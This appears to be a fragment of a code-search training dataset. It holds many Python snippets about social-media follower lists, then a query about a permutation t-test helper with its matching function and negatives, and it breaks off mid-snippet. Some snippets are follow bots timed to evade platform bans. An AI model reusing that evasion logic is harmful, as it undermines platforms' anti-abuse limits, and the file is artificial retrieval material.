f\"friendships/{user_id}/following/\",\n params={\n \"max_id\": max_id,\n \"rank_token\": self.rank_token,\n \"ig_sig_key_version\": config.SIG_KEY_VERSION,\n },\n )\n for user in result[\"users\"]:\n users.append(extract_user_short(user))\n max_id = result.get(\"next_max_id\")\n if not max_id or (amount and len(users) >= amount):\n break\n if amount:\n users = users[:amount]\n return users", "def user_following_gql(self, user_id: int, amount: int = 0) -> list:\n user_id = int(user_id)\n end_cursor = None\n users = []\n variables = {\n \"id\": user_id,\n \"include_reel\": True,\n \"fetch_mutual\": False,\n \"first\": 24\n }\n while True:\n if end_cursor:\n variables[\"after\"] = end_cursor\n data = self.public_graphql_request(\n variables, query_hash=\"e7e2f4da4b02303f74f0841279e52d76\"\n )\n if not data[\"user\"] and not users:\n raise UserNotFound(user_id=user_id, **data)\n page_info = json_value(\n data, \"user\", \"edge_follow\", \"page_info\", default={}\n )\n edges = json_value(\n data, \"user\", \"edge_follow\", \"edges\", default=[]\n )\n for edge in edges:\n users.append(extract_user_short(edge[\"node\"]))\n end_cursor = page_info.get(\"end_cursor\")\n if not page_info.get(\"has_next_page\") or not end_cursor:\n break\n if amount and len(users) >= amount:\n break\n # time.sleep(sleep)\n if amount:\n users = users[:amount]\n return users", "def show_following(user_id):\n\n if not g.user:\n flash(\"Access unauthorized.\", \"danger\")\n return redirect(\"/\")\n\n user = User.query.get_or_404(user_id)\n users_blocking = [block.user_blocking_id for block in Blocks.query.all() if block.user_being_blocked_id == g.user.id]\n likes = [message for message in user.likes if message.user_id not in users_blocking]\n return render_template('users/following.html', user=user, likes=likes)", "def by_followee_id(cls, followee_id, request):\n\t\treturn request.dbsession.query(Follow).filter_by(followee_id=followee_id).all()", "def get_queryset(self, *args, **kwargs):\n following_username = self.kwargs.get(self.look_url_kwarg)\n following_users = FollowUser.objects.filter(\n following_username=following_username)\n\n return following_users", "def get(self, request, format=None):\n queryset = request.user.following.all()\n paginated = self.paginate_queryset(queryset)\n return self.get_paginated_response(UserProfileSerializer(paginated, many=True).data)", "def add_following(self, user_id):\n sleep(360) # too much follows => function ban\n self.following.append(user_id)\n return perform_with_ran_delay(self.instagram.follow, user_id)", "def resolve_followers(self, info):\n user = info.context.user\n follow_request = FollowRequest.objects.filter(following=user.id, pending=False)\n return [follow.follower for follow in follow_request]", "def get_follows_route(request):\n\n db_conn = request['db_conn']\n current_user = get_current_user(request)\n user_id = request['params'].get('user_id')\n if user_id:\n user = get_user({'id': user_id}, db_conn)\n if not user:\n return abort(404)\n if (user != current_user and\n user['settings']['view_follows'] != 'public'):\n return abort(403)\n else:\n user = current_user\n if not user:\n return abort(401)\n params = dict(**request['params'])\n params['user_id'] = user['id']\n follows = list_follows(params, db_conn)\n return 200, {\n 'follows': [deliver_follow(follow, access='private')\n for follow in follows]\n }", "async def get_new_followers(self, bearer_token:str, user_id:str, after:str) -> list:\n\n headers = {\"Client-Id\": self.TWITCH_PARAMS['client_id'], \"Authorization\": f\"Bearer {bearer_token}\"}\n params = {\"to_id\": user_id, \"first\": 100}\n if after:\n params[\"after\"] = after\n output = []\n while True:\n async with self.bot.session.get(self.TWITCH_USER_FOLLOWS_URL, params=params, headers=headers) as r:\n data = await r.json()\n # self.logger.info(data)\n output.extend(data.get('data', list()))\n if len(data.get('data', list())) < 100:\n break\n params['after'] = data.get('pagination', {}).get('cursor', None)\n return output, data.get('pagination', {}).get('cursor', None)", "def getTotalFollowers(api, user_id):\n\n followers = []\n next_max_id = True\n while next_max_id:\n # first iteration hack\n if next_max_id is True:\n next_max_id = ''\n\n _ = api.getUserFollowers(user_id, maxid=next_max_id)\n followers.extend(api.LastJson.get('users', []))\n next_max_id = api.LastJson.get('next_max_id', '')\n return followers", "def getTotalFollowers(api, user_id):\n\n followers_ = []\n next_max_id = True\n while next_max_id:\n # first iteration hack\n if next_max_id is True:\n next_max_id = ''\n\n _ = api.getUserFollowers(user_id, maxid=next_max_id)\n followers_.extend(api.LastJson.get('users', []))\n next_max_id = api.LastJson.get('next_max_id', '')\n return followers_", "def user_following(username, max: int = None):\n for user_dict in client.user_relationships(username, max=max, type=\"following\"):\n print(json.dumps(user_dict))", "def followed_by(self, user_id):\n\n url = \"https://api.instagram.com/v1/users/{0}/followed-by?access_token={1}\".format(user_id, self.access_token)\n\n request = requests.get(url)\n return request.json()", "def get_queryset(self):\n user: User = self.request.user\n following_users = user.profile.following.all()\n return Post.objects.filter(author__in=following_users).order_by('created')", "def user_follow():\n data = request.get_json(force=True)\n follower = User.query.get(data['follower'])\n following = User.query.get(data['following'])\n follower.followcheck.append(following)\n db.session.commit()\n return {'followed': True}", "def _user_follower_info(self, uid: int = 0) -> List[_InstagramUser]:\n # If no uid was specified, use the authenticated user's uid\n if uid == 0:\n uid = self.uid\n\n followers: List[Dict[str, Any]] = self.api.getTotalFollowers(uid)\n user_followers = list([_InstagramUser(x) for x in followers])\n return user_followers", "def follow_user(cls, user, following):\r\n pass", "def getFollowings(self,id=None,**kwargs):\n # GET /followings [/$id]\n debugMain('getEntitiesIFollow')\n if id is None:\n return self._genericGet('/followings',**kwargs)\n else:\n return self._genericGet('/followings/%s'%id,**kwargs)", "def users_followers(user_id):\n\n if not g.user:\n flash(\"Access unauthorized.\", \"danger\")\n return redirect(\"/\")\n\n user = User.query.get_or_404(user_id)\n users_blocking = [block.user_blocking_id for block in Blocks.query.all() if block.user_being_blocked_id == g.user.id]\n likes = [message for message in user.likes if message.user_id not in users_blocking]\n return render_template('users/followers.html', user=user, likes=likes)", "def follow(request, usertofollow):\n to_follow = Member.objects.get(user__username=usertofollow)\n user = Member.objects.get(user=request.user)\n user.following.add(to_follow)\n user.save()\n return redirect(request.META['HTTP_REFERER'])", "def get_friends(user_id):\n return list(set(get_following(user_id)) &\n set(get_followers(user_id)))", "def add_follow(follow_id):\n\n want_to_follow_user = User.query.get_or_404(follow_id)\n if want_to_follow_user.private:\n # =========== NEED TO IMPLEMENT ====================\n # send them a request to follow\n want_to_follow_user.from_users.append(g.user) \n db.session.commit()\n flash(\"Your request has been sent\", \"success\")\n return redirect(f\"/users/{g.user.id}/following\")\n\n g.user.following.append(want_to_follow_user)\n db.session.commit()\n\n return redirect(f\"/users/{g.user.id}/following\")", "def feeds(self):\n return Order.objects.filter(customer__in=self.following.all())", "def follows(self, user_id):\n\n url = \"https://api.instagram.com/v1/users/{0}/follows?access_token={1}\".format(user_id, self.access_token)\n\n request = requests.get(url)\n return request.json()", "def follow_user(cls, user, following):\n pass", "def get_followers(user):\n if user.has_key('followers_list'):\n pass\n else:\n if user.has_key('followers_count'):\n if user['followers_count'] > 4999:\n pages = user['followers_count'] / 5000\n f_list = []\n for page in range(pages):\n try:\n follower_set = api.GetFollowers(user_id=user['id'], cursor=page, count=5000)\n friends_list = []\n for follower in follower_set:\n twitter_users.update({'id':follower.GetId()},follower.AsDict(),upsert=True)\n friends_list.append(follower.GetId())\n f_list = friends_list + f_list\n time.sleep(60)\n user['followers_list'] = f_list\n twitter_users.update({'id': user['id']}, user)\n print \"\\n\\nGot %s followers out of %s listed\" % (len(f_list), user['followers_count'])\n except Exception, e:\n print str(e)\n time.sleep(60)\n else:\n try:\n follower_set = api.GetFollowers(user_id=user['id'], count=5000)\n friends_list = []\n for follower in follower_set:\n twitter_users.update({'id':follower.GetId()},follower.AsDict(),upsert=True)\n friends_list.append(follower.GetId())\n user['followers_list'] = friends_list\n twitter_users.update({'id': user['id']}, user)\n print \"\\n\\nGot %s followers out of %s listed\" % (len(friends_list), user['followers_count'])\n except Exception, e:\n print str(e)\n time.sleep(60)", "def is_user_following(self, user_id):\n return user_id in self.following", "def follows(self):\r\n return relationships.Follows(self)", "def followers(self):\r\n url = '{0}/followers'.format(self.get_url())\r\n return http.Request('GET', url), parsers.parse_json", "def followers(self):\r\n url = '{0}/followers'.format(self.get_url())\r\n return http.Request('GET', url), parsers.parse_json", "def followers(self):\r\n url = '{0}/followers'.format(self.get_url())\r\n return http.Request('GET', url), parsers.parse_json", "def followers(self):\r\n url = '{0}/followers'.format(self.get_url())\r\n return http.Request('GET', url), parsers.parse_json", "def follow(self, followerId: int, followeeId: int) -> None:\n if followeeId not in self.followList.get(followerId, [followerId]):\n self.followList[followerId] = self.followList.get(followerId, [followerId]) + [followeeId]\n # print(self.followList)", "def auto_follow_followers():\n\n following = set(t.friends.ids(screen_name=TWITTER_HANDLE)[\"ids\"])\n followers = set(t.followers.ids(screen_name=TWITTER_HANDLE)[\"ids\"])\n\n not_following_back = followers - following\n\n for user_id in not_following_back:\n try:\n t.friendships.create(user_id=user_id, follow=False)\n except Exception as e:\n print(\"error: %s\" % (str(e)))", "def getFollowers(self,id=None,**kwargs):\n # GET /followers [/$id]\n debugMain('getFollowers')\n if id is None:\n return self._genericGet('/followers',**kwargs)\n else:\n return self._genericGet('/followers/%s'%id,**kwargs)", "def user_playlist_is_following(self, playlist_id, user_ids, **kwargs):\n return self._get(\n API.PLAYLIST_FOLLOWERS_CONTAINS.value.format( # pylint: disable=no-member\n playlist_id=playlist_id\n ),\n ids=\",\".join(user_ids),\n **kwargs,\n )", "def users_being_followed_tweets():\n username = request.authorization.username\n tweets = []\n\n user_id = get_user_id(username);\n tuples = query_db('''\n select message.*, user.* from message, user\n where message.author_id = user.user_id and (\n user.user_id = ? or\n user.user_id in (select whom_id from follower\n where who_id = ?))\n order by message.pub_date desc limit ?''',\n [user_id, user_id, PER_PAGE])\n\n for tuple in tuples:\n tweet = {}\n tweet[\"message_id\"] = tuple['message_id']\n tweet[\"author_id\"] = tuple['author_id']\n tweet[\"text\"] = tuple['text']\n tweet[\"pub_date\"] = tuple['pub_date']\n tweet[\"username\"] = tuple['username']\n tweet[\"email\"] = tuple['email']\n tweets.append(tweet)\n\n return jsonify({'tweets': tweets}), 200", "def users_followers(user_id):\n\n user = User.query.get_or_404(user_id)\n return render_template('users/followers.html', user=user)", "def getFollowers():\n followers = []\n next_max_id = True\n while next_max_id:\n # first iteration hack\n if next_max_id is True:\n next_max_id = ''\n\n _ = GetInstagramAnswer.igApi.getUserFollowers(GetInstagramAnswer.igApi.username_id, maxid=next_max_id)\n followers.extend(GetInstagramAnswer.igApi.LastJson.get('users',[]))\n next_max_id = GetInstagramAnswer.igApi.LastJson.get('next_max_id','')\n return \"You have currently \"+str(len(followers))+\" Followers on Instagram.\"", "def test_get_list_of_following_users_without_auth(self):\n self.authorize_user(self.user)\n with self.settings(\n EMAIL_BACKEND='django.core.mail.backends.locmem.EmailBackend'):\n self.register_user(self.user1)\n response = self.client.get(self.following_list_url)\n self.assertEqual(response.content,\n b'{\"following\": []}')\n self.assertEqual(response.status_code, status.HTTP_200_OK)", "def follows(self):\n return relationships.Follows(self)", "def followers(self):\r\n request = http.Request('GET', '{0}/followers/'.format(self.get_url()))\r\n\r\n return request, parsers.parse_json", "def followers(self):\r\n request = http.Request('GET', '{0}/followers/'.format(self.get_url()))\r\n\r\n return request, parsers.parse_json", "def followers(self):\r\n request = http.Request('GET', '{0}/followers/'.format(self.get_url()))\r\n\r\n return request, parsers.parse_json", "def followers(self):\n return self.data.get(\"followers\")", "def getUserFollowers(user):\n sleep(5)\n first = user+\"communaute/\"\n driver.get(first)\n sleep(5)\n followers = set()\n followers_page = []\n div_links = []\n\n nb_follower_div = driver.find_element_by_xpath(\"//div[@class='inner-nav-item current ']\").is_displayed()\n if nb_follower_div:\n nb_follower_text = driver.find_element_by_xpath(\"//div[@class='inner-nav-item current ']\").text\n nb_follower = nb_follower_text.split(\"(\",2)[1].split(\")\",2)[0]\n nb_follower = int(nb_follower)\n print(\"NB Followers : \",nb_follower)\n\n pagination = driver.find_elements_by_xpath(\"//a[@class='xXx button button-md item']\")\n page_links = [elem.get_attribute('href') for elem in pagination]\n page_links.insert(0,first)\n\n if nb_follower > 0:\n for num in page_links:\n if page_links.index(num) > 0:\n driver.get(num)\n sleep(5)\n div_links = driver.find_elements_by_xpath(\"//a[@class='xXx']\")\n followers_page = [elem.get_attribute('href') for elem in div_links]\n for link in followers_page:\n if link_patterns in link:\n followers.add(link)\n return followers", "def list(self, user_ids: Optional[List[UserId]]) -> List[U]:\n ...", "def get_people_followed(user_id, ignore_exceptions=False, return_type=list, start_index=0):\n def _get_followed(_user_id, _ignore_exceptions=False, _start_index=0, _count=100):\n \"\"\"This function performs the API call to get the users followed from a single GET request.\n\n .. versionchanged:: 3.1.0\n Renamed the function to only have a single underscore prefix and added parenthesis to the exception\n classes.\n\n :param _user_id: The User ID for the user against which to check\n :type _user_id: int\n :param _ignore_exceptions: Determines whether non-200 responses should raise an exception (Default: ``False``)\n :type _ignore_exceptions: bool\n :param _start_index: The startIndex for the API call (Default: ``0``)\n :type _start_index: int\n :param _count: The maximum number of results to return in the API call (Default: ``100``)\n :type _count: int\n :returns: The data from the @following sub-endpoint in JSON format\n :raises: :py:exc:`khorosjx.errors.exceptions.UserQueryError`,\n :py:exc:`khorosjx.errors.exceptions.UserNotFoundError`,\n \"\"\"\n _following_url = f\"{base_url}/people/{_user_id}/@following?count={_count}\" + \\\n f\"&startIndex={_start_index}\"\n _response = core.get_request_with_retries(_following_url)\n if _response.status_code == 200:\n _following_data = _response.json()\n else:\n if _ignore_exceptions:\n _empty_response = {\"list\": []}\n _following_data = core_utils.convert_dict_to_json(_empty_response)\n else:\n if _response.status_code == 404:\n raise errors.exceptions.UserNotFoundError()\n else:\n raise errors.exceptions.UserQueryError()\n return _following_data\n\n # Verify that the core connection has been established\n verify_core_connection()\n\n # Perform the initial API call\n people_followed = []\n following_data = _get_followed(user_id, ignore_exceptions)\n\n # Continue looping through the data from subsequent calls until an empty list is found in the JSON response\n while following_data.get('list'):\n for user_followed in following_data.get('list'):\n # Append reach User ID to the list\n people_followed.append(user_followed.get('id'))\n\n # Perform the next API call for the next 100 users\n start_index += 100\n following_data = _get_followed(user_id, ignore_exceptions, start_index)\n\n # Convert the list to a comma-separated string and return the value\n if return_type == str:\n people_followed = ','.join(people_followed)\n elif return_type == tuple:\n people_followed = tuple(people_followed)\n return people_followed", "def user_follow_users(self, ids=None, **kwargs):\n return self._put(\n API.MY_FOLLOWING.value, type=\"user\", ids=\",\".join(ids or []), **kwargs\n )", "def get_mavens(user_id):\n following = get_following(user_id)\n return list(User.objects.exclude(pk__in=(following + [user_id])) \\\n .order_by('-userstatistics__karma') \\\n .values_list('id', flat=True))", "def all_followers(twitter_dict, twitter_name): \r\n \r\n following_list = []\r\n for user in twitter_dict:\r\n f_list = twitter_dict[user]['following']\r\n if twitter_name in f_list:\r\n following_list.append(user) \r\n return following_list", "def get_following(self, from_mongo=True, from_file=False):\n\n all_following = dict()\n following = list()\n\n #Get the data from Mongo\n if from_mongo:\n following = self._users_collection.find({'am_following': True})\n\n #Get the live data\n elif not from_mongo and not from_file:\n following = self.getTotalSelfFollowers()\n json.dump(following, open('all_following.json', 'w'), indent=4)\n\n #Get the data from a saved file\n else:\n saved_following = json.load(open('all_following.json', 'r'))\n\n for saved_following in following:\n saved_following['am_following'] = True\n all_following[saved_following['pk']] = saved_following\n\n return all_following", "def follow_following_followers(self):\n self.logger.log(\"starting follow_following_followers...\")\n follows_accounts = self.following\n random.shuffle(follows_accounts)\n for acc in follows_accounts:\n try:\n try:\n followw = perform_with_ran_delay(self.instagram.get_followers, acc, 150, 15,\n delayed=True)\n accountstofollow = followw[\"accounts\"]\n random.shuffle(accountstofollow)\n if len(accountstofollow) > 10:\n accountstofollow = accountstofollow[:10]\n for ac in accountstofollow:\n if not self.is_user_following(ac.identifier):\n self.add_following(ac.identifier)\n self.logger.log(\"following: {}\".format(ac.username))\n except Exception as e:\n print(e)\n self.logger.log(str(e))\n finally:\n sleep(3)", "def follow_closely(api_, follow_username):\n big_list = True\n max_id = ''\n following = []\n\n while big_list:\n api_.getSelfUsersFollowing(maxid=max_id)\n followers_ = api_.LastJson\n for f in followers_['users']:\n following.append(f)\n big_list = followers_['big_list']\n if not big_list:\n break\n # this key only exists if there is more pages\n max_id = followers_['next_max_id']\n\n for f in following:\n if f['username'] == follow_username:\n return True, f", "def follow(self, followerId: int, followeeId: int) -> None:\n self.user_followed[followerId].append(followeeId)", "def following(request):\n user = request.user\n posts = Post.objects.filter(\n author__in=user.following.all()).order_by('-timestamp')\n\n paginator = Paginator(posts, 10)\n\n page_number = request.GET.get('page')\n page_object = paginator.get_page(page_number)\n\n return render(request, \"network/following.html\", {\"posts\": page_object})", "def is_following_by_username(self, id):\n return self.followed.filter(followers.c.followed_id == id).count() > 0", "def follows_target_check(twitter,top_followers_list):\n yes_follow_list = []\n not_follow_list = []\n following_dict = {}\n target = 'HillaryClinton'\n \n for user in top_followers_list:\n params = {'source_id':user, 'target_screen_name':target}\n response = twitter.request('friendships/show', params)\n data = response.json()\n #print(\"DATAAA::\",data)\n if response.status_code == 200:\n #print(\"IN BIGG IFFFFF:::\")\n following_dict = data['relationship']['source']\n #print(\"following_dict::\",following_dict)\n check = following_dict['following']\n #print(\"check::\",check)\n if check:\n #print(\"IN IFFFFF:::\")\n yes_follow_list.append(user)\n \n else:\n #print(\"IN ELSEEEE:::\")\n not_follow_list.append(user)\n \n else:\n print('Got error %s \\nsleeping for 15 minutes.' % response.text)\n sys.stderr.flush()\n time.sleep(61 * 15)\n \n print(\"YES_LIST:::\",yes_follow_list) \n print(\"NO_LIST:::\",not_follow_list) \n return not_follow_list", "def follow(current_user,user_id):\n if request.method == \"POST\":\n #follee = request.get_json('user_id')\n if User.query.filter_by(userid= user_id):\n follow = Follows(userid =user_id, follower_id =current_user.userid)\n db.session.add(follow)\n db.session.commit()\n return jsonify({'message' :'You are now following'})\n return jsonify({'message' :'User doesnt exist..Try again'})\n return jsonify({'errors' : 'Method Invalid'})", "def getNewsFeed(self, userId: int):\n if userId not in self.followList:\n self.followList[userId] = [userId]\n res = []\n\n for user in self.followList[userId]:\n if self.tweetTimeLine.get(user, [user]):\n res += self.tweetTimeLine.get(user, [])\n res.sort()\n res = res[:10]\n # print(res)\n return [i[1] for i in res]", "def get_followers1(user):\n if user.has_key('followers_list'):\n pass\n else:\n if user.has_key('followers_count'):\n if user['followers_count'] > 4999:\n pages = user['followers_count'] / 5000\n f_list = []\n for page in range(pages):\n try:\n follower_set = api1.GetFollowers(user_id=user['id'], cursor=page, count=5000)\n friends_list = []\n for follower in follower_set:\n twitter_users.update({'id':follower.GetId()},follower.AsDict(),upsert=True)\n friends_list.append(follower.GetId())\n f_list = friends_list + f_list\n time.sleep(60)\n user['followers_list'] = f_list\n twitter_users.update({'id': user['id']}, user)\n print \"\\n\\nGot %s followers out of %s listed\" % (len(f_list), user['followers_count'])\n except Exception, e:\n print str(e)\n time.sleep(60)\n else:\n try:\n follower_set = api1.GetFollowers(user_id=user['id'], count=5000)\n friends_list = []\n for follower in follower_set:\n twitter_users.update({'id':follower.GetId()},follower.AsDict(),upsert=True)\n friends_list.append(follower.GetId())\n user['followers_list'] = friends_list\n twitter_users.update({'id': user['id']}, user)\n print \"\\n\\nGot %s followers out of %s listed\" % (len(friends_list), user['followers_count'])\n except Exception, e:\n print str(e)\n time.sleep(60)", "def followers(self, handles):\n print(handles)\n followers_list = {}\n for handle in handles:\n followers = self.twitter_client.followers_ids(screen_name=handle)\n\n r = []\n for page in self.paginate(followers, 100):\n results = self.twitter_client.lookup_users(user_ids=page)\n for result in results:\n r.append(result.screen_name)\n followers_list[handle] = r\n return followers_list", "def get_followers(self):\n rsp = self.session.get(self.url + \"/followers\")\n soup = self.getSoup(rsp.content)\n followers = soup.find_all('div', class_ = 'zm-person-item')\n if not followers:\n return\n i, follower = 0, None\n for follower in followers:\n i += 1\n yield follower.find('a', recursive = False)['href']\n while not i % Page_Items_Num:\n data = {\n 'offset' : i,\n 'start' : follower['id'].split('-')[-1],\n '_xsrf' : self.session.getCookie()['_xsrf']\n }\n rsp = self.session.post(self.url + \"/followers\", data = data)\n if rsp.json()['r'] == 0:\n followers = self.getSoup(rsp.json()['msg'][1]).find_all('div', class_ = 'zm-person-item')\n for follower in followers:\n i += 1\n yield follower.find('a', recursive = False)['href']\n else:\n return", "def followed_by(self):\r\n return relationships.FollowedBy(self)", "def is_authenticated_user_following(self, username=None,id=None):\n if not self.is_authenticated:\n raise PicplzError(\"is_authenticated_user_following requires an authenticated API instance\")\n \n return None", "def fetch_friend_ids(self, user, **kwargs):\n friends = self.fetch_friends(user, **kwargs)\n friend_ids = []\n for friend in friends['data']:\n friend_ids.append(friend['id'])\n return friend_ids", "def get(self, entity, follower_id):\n return jsonify(entity.followers.get_or_404(id=follower_id).to_json())", "def follow(self, followerId, followeeId):\n\n # 把 followeeId append到他的 follow 属性中\n if followerId == followeeId: # 不能自己关注自己\n return\n # 实例化一个user(followerID)\n follower = UserInfo()\n follower.user_id = followerId \n follower.follows.append(followeeId) \n self.user_pool[followerId] = follower", "def is_following(self, user):\n return self.followed.filter(followers.c.followed_id == user.id).count() > 0", "def is_following(self, user):\n return self.followed.filter(followers.c.followed_id == user.id).count() > 0", "def following(self):\n return self.data.get(\"following\")", "def followers(congressDict, twitterAPI):\n most = twitterAPI.get_user(list(congressDict.items())[0][1]) # Choose an arbitrary starting point from the dictionary and assign it their user details.\n least = most\n for name in congressDict:\n tempAPI = twitterAPI.get_user(congressDict[name]) # Get the user details of each congress members' twitter handle.\n numFollowers = tempAPI._json['followers_count']\n if (numFollowers > most._json['followers_count']): # If the follower count is greater than most, replace the user details with current one.\n most = tempAPI\n elif (numFollowers < least._json['followers_count']): # If the follower count is lower than least, replace the user details with the current one.\n least = tempAPI\n return [most._json[\"name\"], least._json[\"name\"]]", "def test_followers_following_list_authorized(self):\n\n # user2 following user1\n # follow = Follows(user_being_followed_id=1, user_following_id=2)\n\n self.u2.following.append(self.u)\n db.session.commit()\n\n with self.client as client:\n\n client.post(\n '/login',\n data = {\n \"username\" : self.u.username,\n \"password\" : \"password\"\n },\n )\n\n response = client.get(\"/users/2/following\")\n html = response.get_data(as_text=True)\n\n self.assertEqual(response.status_code, 200)\n self.assertIn('\"/users/1\"' ,html)\n \n response = client.get(\"/users/1/followers\")\n html = response.get_data(as_text=True)\n\n self.assertEqual(response.status_code, 200)\n self.assertIn('\"/users/2\"' ,html)", "def add_follow(follow_id):\n followed_user = User.query.get_or_404(follow_id)\n if not g.user or g.user.id == follow_id or followed_user.is_blocking(g.user):\n flash(\"Access unauthorized.\", \"danger\")\n return redirect(\"/\")\n\n g.user.following.append(followed_user)\n db.session.commit()\n\n return redirect(f\"/users/{g.user.id}/following\")", "def followUser(following):\n\n cur, user_id, con = initialise(3, True)\n cur.execute(\"INSERT INTO followers (user, following) VALUES ((SELECT username FROM users WHERE id = ?), ?)\", (user_id, following))\n finish(con)", "def get_friends_ids(api, user_id):\n url = \"https://api.twitter.com/1.1/friends/ids.json\"\n rate_status = check_rate_limit(api, url)\n remaining_requests = rate_status[\"remaining\"]\n if not remaining_requests:\n delay = rate_status['reset'] - time.time()\n if delay > 0:\n print \"Sleeping {0}...\".format(delay)\n time.sleep(delay) \n rate_status = check_rate_limit(api, url)\n remaining_requests = rate_status[\"remaining\"]\n\n friends_ids = []\n params = {\"user_id\": user_id, \"counter\": 0, \n \"count\": 5000, \"stringify_ids\": True}\n response = api.get(url, params=params)\n friends_ids.extend(response.json().get(\"ids\", []))\n response.close()\n remaining_requests -= 1\n\n while response.json().get('next_cursor'):\n if not remaining_requests:\n delay = rate_status['reset'] - time.time()\n if delay > 0:\n print \"Sleeping {0:,.4} s...\".format(delay)\n time.sleep(delay) \n rate_status = check_rate_limit(api, url)\n remaining_requests = rate_status[\"remaining\"]\n params[\"cursor\"] = response.json().get('next_cursor_str')\n response = api.get(url, params=params)\n friends_ids.extend(response.json().get(\"ids\", []))\n response.close()\n remaining_requests -= 1\n return friends_ids", "def all_followers (twitter_data, username):\n\n # initialize\n followers = []\n\n for key in twitter_data: # go through every username in twitter_data\n if username in twitter_data [key]['following']: # check each 'following'\n followers.append (key)\n\n followers.sort() # sort the list alphabetically for testing purposes\n return followers", "def get_all_followers(self):\n return get_all_(self.get_followers)", "def follows(self):\r\n request = http.Request('GET', '{0}/follows/'.format(self.get_url()))\r\n\r\n return request, parsers.parse_json", "def scrapeFollowingFromAnAccount():\n global api", "def followed_by(self):\n return relationships.FollowedBy(self)", "def is_following(self, user):\n return self.followed.filter_by(\n followed_id=user.id).first() is not None", "def getNewsFeed(self, userId: 'int') -> 'List[int]':\n self.followees[userId].add(userId)\n feeds = heapq.merge(*[iter(self.tweets[idx]) for idx in self.followees[userId]])\n return [idx for _, idx in itertools.islice(feeds, 10)]", "def get(self, request):\n # Retrieve the user from the request if they have been authenticated\n current_user = request.user\n # Get the following & followers username list\n # And the following & followers count for the current user\n user_following_data = get_user_following_data(current_user)\n # Return the follower details for the current user\n return Response(\n {\n \"message\": FOLLOW_USER_MSGS['MY_FOLLOWERS_SUCCESSFUL'],\n \"following\": user_following_data[\"following\"],\n \"followers\": user_following_data[\"followers\"],\n \"followingCount\": user_following_data[\"followingCount\"],\n \"followersCount\": user_following_data[\"followersCount\"]\n },\n status=status.HTTP_200_OK\n )", "def tweets_following_users(username):\n user_profile = query_db('select * from user where username = ?',\n [username], one=True)\n follow_tweets = []\n\n if user_profile is None:\n abort(404)\n\n tuples = query_db('''select message.* from message, follower where\n follower.whom_id = message.author_id and follower.who_id = ?\n order by message.pub_date desc limit ?''', [user_profile['user_id'], PER_PAGE])\n\n for tuple in tuples:\n follow_tweet = {}\n follow_tweet[\"message_id\"] = tuple['message_id']\n follow_tweet[\"author_id\"] = tuple['author_id']\n follow_tweet[\"text\"] = tuple['text']\n follow_tweet[\"pub_date\"] = tuple['pub_date']\n follow_tweets.append(follow_tweet)\n\n return jsonify({'follow_tweets': follow_tweets}), 200" ]
[ "0.8282055", "0.7685639", "0.76842815", "0.76074857", "0.7492455", "0.7339311", "0.7327111", "0.7205236", "0.71110606", "0.7069504", "0.70240045", "0.69244426", "0.68713117", "0.68708545", "0.68651557", "0.6858568", "0.68433887", "0.67436033", "0.6737113", "0.67269635", "0.66934717", "0.66748", "0.66501886", "0.6646064", "0.6639912", "0.6639296", "0.6628967", "0.6618302", "0.66130495", "0.656076", "0.6501636", "0.64866006", "0.6469502", "0.6452966", "0.6428073", "0.64227796", "0.64096993", "0.6408517", "0.6376267", "0.63757163", "0.633501", "0.633186", "0.6290592", "0.6290134", "0.6290134", "0.6290134", "0.6290134", "0.62790376", "0.62758577", "0.6249006", "0.6241869", "0.6221779", "0.62192667", "0.61976063", "0.61959654", "0.61884445", "0.61859244", "0.61859244", "0.61859244", "0.61789304", "0.61752063", "0.6164898", "0.6153356", "0.6152201", "0.6151841", "0.6141754", "0.60949457", "0.60948193", "0.60674095", "0.60618126", "0.605477", "0.6054124", "0.6046872", "0.60451615", "0.60406834", "0.6037563", "0.60216033", "0.6016955", "0.60147595", "0.6014579", "0.60069543", "0.5982111", "0.59767383", "0.5968494", "0.5968494", "0.59439635", "0.594369", "0.59419334", "0.59413403", "0.59384245", "0.59356004", "0.5923313", "0.59183663", "0.5903305", "0.59019613", "0.5891216", "0.5888061", "0.5878933", "0.5877713", "0.58723813" ]
0.7454274
5
Aux function for permutation_t_test (for parallel comp).
def _max_stat(X, X2, perms, dof_scaling): n_samples = len(X) mus = np.dot(perms, X) / float(n_samples) stds = np.sqrt(X2[None, :] - mus * mus) * dof_scaling # std with splitting max_abs = np.max(np.abs(mus) / (stds / sqrt(n_samples)), axis=1) # t-max return max_abs
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def PermutationTest(self):\n # U = union of B and T\n union_sample = np.concatenate((self.x_benchmark, self.x_trial), axis=0)\n n_samples = self.NB + self.NT\n \n # Initialize array of test statistic values\n self.TS_tilde = np.zeros(self.n_perm, dtype=np.float)\n \n count=0\n print(\"Running {:d} Permutations... 0%\".format(self.n_perm))\n \n # loop over different samplings\n for i in range(self.n_perm):\n \n # Print progress\n progress = int(round(((i+1)/self.n_perm)*100,0))\n progress_list = [25, 50, 75, 100]\n if count < len(progress_list) and progress == progress_list[count]:\n count+=1\n print(\"Running {:d} Permutations... {:d}%\".format(self.n_perm, progress))\n \n # Random permutations of U (sampling without replacement)\n x_resampled = shuffle(union_sample)\n # Assign first NB elements to Benchmark\n B_resampled = x_resampled[:self.NB]\n # Assign remaning NT elements to Trial\n T_resampled = x_resampled[self.NB:]\n \n # Compute the test statistic\n self.TS_tilde[i] = self.TestStatistic(B_resampled, T_resampled)", "def permutation_t_test(\n X, n_permutations=10000, tail=0, n_jobs=None, seed=None, verbose=None\n):\n from .cluster_level import _get_1samp_orders\n\n n_samples, n_tests = X.shape\n X2 = np.mean(X**2, axis=0) # precompute moments\n mu0 = np.mean(X, axis=0)\n dof_scaling = sqrt(n_samples / (n_samples - 1.0))\n std0 = np.sqrt(X2 - mu0**2) * dof_scaling # get std with var splitting\n T_obs = np.mean(X, axis=0) / (std0 / sqrt(n_samples))\n rng = check_random_state(seed)\n orders, _, extra = _get_1samp_orders(n_samples, n_permutations, tail, rng)\n perms = 2 * np.array(orders) - 1 # from 0, 1 -> 1, -1\n logger.info(\"Permuting %d times%s...\" % (len(orders), extra))\n parallel, my_max_stat, n_jobs = parallel_func(_max_stat, n_jobs)\n max_abs = np.concatenate(\n parallel(\n my_max_stat(X, X2, p, dof_scaling) for p in np.array_split(perms, n_jobs)\n )\n )\n max_abs = np.concatenate((max_abs, [np.abs(T_obs).max()]))\n H0 = np.sort(max_abs)\n if tail == 0:\n p_values = (H0 >= np.abs(T_obs[:, np.newaxis])).mean(-1)\n elif tail == 1:\n p_values = (H0 >= T_obs[:, np.newaxis]).mean(-1)\n elif tail == -1:\n p_values = (-H0 <= T_obs[:, 